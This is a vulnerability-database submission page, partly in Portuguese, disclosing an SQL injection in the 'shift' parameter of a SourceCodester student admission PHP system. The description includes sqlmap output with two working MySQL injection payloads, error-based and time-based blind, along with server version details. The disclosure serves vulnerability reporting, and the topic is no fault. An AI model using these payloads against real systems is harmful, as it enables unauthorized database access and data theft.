Submeter #42807: Student-Admission CMS Shift parameter Sqlinjectioninformação

TítuloStudent-Admission CMS Shift parameter Sqlinjection
DescriçãoThe commit page did not check the shift parameter resulting in Sql injection. The Shift parameter is not checked resulting in Sql injection Direct attack using Sqlmap Sqlmap Attack ··· POST parameter 'shift' is vulnerable. Do you want to keep testing the others (if any)? [y/N] sqlmap identified the following injection point(s) with a total of 1581 HTTP(s) requests: --- Parameter: shift (POST) Type: error-based Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET) Payload: sname=bbb&gname=aaa&contact=1&[email protected]&address=111111&class=1&shift=1 AND GTID_SUBSET(CONCAT(0x717a766b71,(SELECT (ELT(3656=3656,1))),0x7162766a71),3656)&gender=female&blgroup=abc&division=1&submit=Submit Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: sname=bbb&gname=aaa&contact=1&[email protected]&address=111111&class=1&shift=1 AND (SELECT 2934 FROM (SELECT(SLEEP(5)))GVhT)&gender=female&blgroup=abc&division=1&submit=Submit --- [09:45:36] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.39, PHP 5.6.9 back-end DBMS: MySQL >= 5.6 ··· Url:https://github.com/badboycxcc/Student-Admission-Sqlinjection Code Download:https://www.sourcecodester.com/php/15514/online-admission-system-php-and-mysql.html
Fonte⚠️ https://github.com/badboycxcc/Student-Admission-Sqlinjection
Utilizador
 cxaqhq (UID 23728)
Submissão04/08/2022 05h20 (há 4 anos)
Moderação04/08/2022 07h22 (2 hours later)
EstadoAceite
Entrada VulDB205564 [SourceCodester Online Admission System POST Parameter shift Injeção SQL]
Pontos20

VoltarVisão GeralPróximo

Might our Artificial Intelligence support you?

Check our Alexa App!